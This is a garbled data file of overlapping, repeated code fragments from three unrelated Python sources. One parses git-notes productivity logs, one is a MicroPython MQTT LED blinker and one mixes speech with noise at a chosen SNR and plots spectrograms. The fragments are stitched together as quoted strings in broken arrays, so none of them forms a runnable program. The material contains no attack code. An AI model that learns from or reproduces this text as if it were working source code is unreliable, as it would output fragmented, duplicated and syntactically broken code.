#pp.pprint(log_list) lines_per_commit", "parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args = parser.parse_args()", "(time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + 
time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo,", "import os.path import subprocess import sys import json import argparse from git import", "= [] total_time_per_commit = [] for log in log_list: report = log[1]['log'] if", "#git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs", "0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories']", "commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs: try: for", "logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list", "list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref", "log_list = [] for hexsha, log in logs: try: for sublog in parse_sublogs(log):", "#nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else:", "user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx =", "build_graph import os.path import subprocess import sys import json import argparse from git", "\"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in", "notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. 
Not", "list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2", "except: pass log_list = [] for hexsha, log in logs: try: for sublog", "notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs =", "os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if", "test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import", "notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try:", "in report: continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses)", "\".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git", "% os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits =", "repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits", "# git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in" ]
[ "log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import", "the module launcher loop in main.py; it is passed a handle onto the", "onto the MQTT # dispatcher and to the \"blinky\" config dict in board_config.py", "to %s\", self.topic) # start is called by the module launcher loop in", "mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start", "str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup)", "await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period", "act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs):", "MQTT # dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt,", "ValueError(\"period must be in 50..10000\") self.period = p except Exception as e: log.exc(e,", "\"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) #", "> 10000: raise ValueError(\"period must be in 50..10000\") self.period = p except Exception", "%s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic ==", "def start(mqtt, config): period = config.get(\"period\", 1000) # get period from config with", "def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s", "start(mqtt, config): period = config.get(\"period\", 1000) # get period from config with a", "# get period from config with a default of 1000ms log.info(\"start called, period=%d\",", "topic, len(msg), retained, qos, dup) if topic == self.topic: try: p = int(msg)", "a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period)", "// 2) def period(self, millisecs): self.period = millisecs def on_msg(self, 
topic, msg, retained,", "is passed a handle onto the MQTT # dispatcher and to the \"blinky\"", "handle onto the MQTT # dispatcher and to the \"blinky\" config dict in", "import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic", "millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic =", "# start is called by the module launcher loop in main.py; it is", "topic self.period = period async def blinker(self): while True: act_led(1) await sleep_ms(self.period //", "p except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt):", "def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic)", "self.mqclient = mqclient self.topic = topic self.period = period async def blinker(self): while", "is called by the module launcher loop in main.py; it is passed a", "get period from config with a default of 1000ms log.info(\"start called, period=%d\", period)", "= str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos,", "act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic =", "if topic == self.topic: try: p = int(msg) if p < 50 or", "uasyncio import Loop as loop, sleep_ms from board import act_led class Blinker: def", "import Loop as loop, sleep_ms from board import act_led class Blinker: def __init__(self,", "// 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs", "2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos,", "millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg:", "hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await 
mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) #", "int(msg) if p < 50 or p > 10000: raise ValueError(\"period must be", "main.py; it is passed a handle onto the MQTT # dispatcher and to", "in main.py; it is passed a handle onto the MQTT # dispatcher and", "def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup):", "logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board", "self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic,", "# dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt, config):", "qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try: p", "try: p = int(msg) if p < 50 or p > 10000: raise", "dup) if topic == self.topic: try: p = int(msg) if p < 50", "(len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic:", "def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period //", "topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained,", "on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d", "= topic self.period = period async def blinker(self): while True: act_led(1) await sleep_ms(self.period", "if p < 50 or p > 10000: raise ValueError(\"period must be in", "in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\")", "module launcher loop in main.py; it is passed a handle onto the MQTT", "be in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming", "while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def", "e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") 
mqtt.on_msg(self.on_msg) await", "config.get(\"period\", 1000) # get period from config with a default of 1000ms log.info(\"start", "board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period from config", "or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period = p", "sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period =", "= millisecs def on_msg(self, topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\")", "except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up", "async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\",", "sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg,", "p < 50 or p > 10000: raise ValueError(\"period must be in 50..10000\")", "log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is", "incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed", "topic, period): self.mqclient = mqclient self.topic = topic self.period = period async def", "topic == self.topic: try: p = int(msg) if p < 50 or p", "class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic", "must be in 50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid", "called by the module launcher loop in main.py; it is passed a handle", "period(self, millisecs): self.period = millisecs def on_msg(self, topic, msg, retained, qos, dup): topic", "mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period = period async", "launcher loop 
in main.py; it is passed a handle onto the MQTT #", "passed a handle onto the MQTT # dispatcher and to the \"blinky\" config", "50..10000\") self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\") async", "= p except Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self,", "period async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await", "True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2) def period(self,", "qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by the module launcher", "in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period from", "a handle onto the MQTT # dispatcher and to the \"blinky\" config dict", "Loop as loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient,", "self.topic) # start is called by the module launcher loop in main.py; it", "<filename>blinky/blinky.py<gh_stars>10-100 import logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms", "loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic, period):", "2) act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def", "qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic,", "start is called by the module launcher loop in main.py; it is passed", "= mqclient self.topic = topic self.period = period async def blinker(self): while True:", "__init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period = period", "act_led(0) await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self,", "from config with a default of 1000ms log.info(\"start called, period=%d\", period) bl =", "by the module launcher loop in main.py; it is passed a handle onto", 
"called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called", "topic, msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d", "self.period = p except Exception as e: log.exc(e, \"Invalid incoming message\") async def", "dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg),", "= config.get(\"period\", 1000) # get period from config with a default of 1000ms", "10000: raise ValueError(\"period must be in 50..10000\") self.period = p except Exception as", "\"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if", "logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import act_led class", "config with a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client,", "mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by", "dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try: p =", "retained, qos, dup) if topic == self.topic: try: p = int(msg) if p", "qos, dup) if topic == self.topic: try: p = int(msg) if p <", "to the \"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\",", "period = config.get(\"period\", 1000) # get period from config with a default of", "def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period =", "mqclient self.topic = topic self.period = period async def blinker(self): while True: act_led(1)", "ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic == self.topic: try:", "self.topic = topic self.period = period async def blinker(self): while True: act_led(1) await", "period): self.mqclient = mqclient self.topic = topic self.period = period async def 
blinker(self):", "async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period", "of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period) loop.create_task(bl.blinker()) mqtt.on_init(bl.hook_it_up(mqtt))", "config): period = config.get(\"period\", 1000) # get period from config with a default", "Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient self.topic = topic self.period", "Exception as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\")", "log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic,", "loop in main.py; it is passed a handle onto the MQTT # dispatcher", "board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient = mqclient", "from board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient =", "msg, retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d", "log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\", topic, len(msg), retained, qos, dup) if topic", "sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic, period): self.mqclient", "self.topic: try: p = int(msg) if p < 50 or p > 10000:", "import logging log = logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from", "log.info(\"Subscribed to %s\", self.topic) # start is called by the module launcher loop", "from uasyncio import Loop as loop, sleep_ms from board import act_led class Blinker:", "raise ValueError(\"period must be in 50..10000\") self.period = p except Exception as e:", "dispatcher and to the \"blinky\" config dict in board_config.py def start(mqtt, config): period", "self.period = period async def blinker(self): 
while True: act_led(1) await sleep_ms(self.period // 2)", "p > 10000: raise ValueError(\"period must be in 50..10000\") self.period = p except", "await sleep_ms(self.period // 2) def period(self, millisecs): self.period = millisecs def on_msg(self, topic,", "= int(msg) if p < 50 or p > 10000: raise ValueError(\"period must", "%s\", self.topic) # start is called by the module launcher loop in main.py;", "and to the \"blinky\" config dict in board_config.py def start(mqtt, config): period =", "50 or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period =", "mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to %s\", self.topic) # start is called by the module", "p = int(msg) if p < 50 or p > 10000: raise ValueError(\"period", "dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get period", "the \"blinky\" config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000)", "< 50 or p > 10000: raise ValueError(\"period must be in 50..10000\") self.period", "it is passed a handle onto the MQTT # dispatcher and to the", "== self.topic: try: p = int(msg) if p < 50 or p >", "config dict in board_config.py def start(mqtt, config): period = config.get(\"period\", 1000) # get", "default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"], period) loop.create_task(bl.blinker())", "with a default of 1000ms log.info(\"start called, period=%d\", period) bl = Blinker(mqtt.client, config[\"topic\"],", "1000) # get period from config with a default of 1000ms log.info(\"start called,", "retained, qos, dup): topic = str(topic, \"utf-8\") log.info(\"on_msg: %s (len=%d ret=%d qos=%d dup=%d)\",", "message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to", "await mqtt.client.subscribe(self.topic, qos=1) log.info(\"Subscribed to 
%s\", self.topic) # start is called by the", "= logging.getLogger(__name__) from uasyncio import Loop as loop, sleep_ms from board import act_led", "= period async def blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0)", "\"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg) await mqtt.client.subscribe(self.topic, qos=1)", "blinker(self): while True: act_led(1) await sleep_ms(self.period // 2) act_led(0) await sleep_ms(self.period // 2)", "period from config with a default of 1000ms log.info(\"start called, period=%d\", period) bl", "the MQTT # dispatcher and to the \"blinky\" config dict in board_config.py def", "as loop, sleep_ms from board import act_led class Blinker: def __init__(self, mqclient, topic,", "len(msg), retained, qos, dup) if topic == self.topic: try: p = int(msg) if", "as e: log.exc(e, \"Invalid incoming message\") async def hook_it_up(self, mqtt): log.info(\"hook_it_up called\") mqtt.on_msg(self.on_msg)" ]
[ "160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect =", "norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1", "plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "x2.shape[0] if l1 != l2: if handle_method == 'cut': ll = min(l1, l2)", "= x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix", "x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut': ll", "min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll", "* norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 + x2", "np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1)", "x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32), fs, blocking=True)", "= x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut':", "noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure()", "x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr))", "160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect", "read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True)", "= 
log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5,", "x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if", "feature_extractor import * from matplotlib import pyplot as plt def SNR(x1, x2): from", "+ x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs,", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5,", "numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) / (10.0 **", "from feature_extractor import * from matplotlib import pyplot as plt def SNR(x1, x2):", "<reponame>ZhihaoDU/speech_feature_extractor # coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav", "'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return 20", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data,", "320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect", "= mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313)", "if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2", "plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) / (10.0", "if handle_method == 'cut': ll = min(l1, l2) x1 = 
x1[:ll] x2 =", "plt def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) /", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "l1 != l2: if handle_method == 'cut': ll = min(l1, l2) x1 =", "noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "import wavfile from feature_extractor import * from matplotlib import pyplot as plt def", "utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile", "speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320,", "wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160,", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "elif handle_method == 'append': ll = max(l1, l2) if l1 < ll: x1", "import norm x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05", "norm x2 = x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 *", "x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 !=", "/ norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32)", "= max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2", "== '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = 
wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect =", "def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 =", "return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 =", "noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll]", "mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav')", "noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show()", "= wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech", "if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure()", "l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 =", "np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import", "/ (10.0 ** (0.05 * snr)) mix = x1 + x2 return mix", "160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect =", "5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) 
plt.subplot(312) plt.imshow(spect) noisy_speech =", "plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 /", "* np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2", "320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut')", "l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 =", "x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from", "'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "from scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot as", "pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return 20 *", "numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor", "norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1", "x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2)", "-5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech =", "noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech", "= x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if", "# coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from", "x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = 
max(l1, l2) if", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut')", "'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "coding = utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io", "as plt def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1)", "ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method ==", "= np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg", "/ norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix = x1", "= mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211)", "< ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2", "= x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header =", "mix_by_db(speech_data, noise_data, -5, 'cut') spect 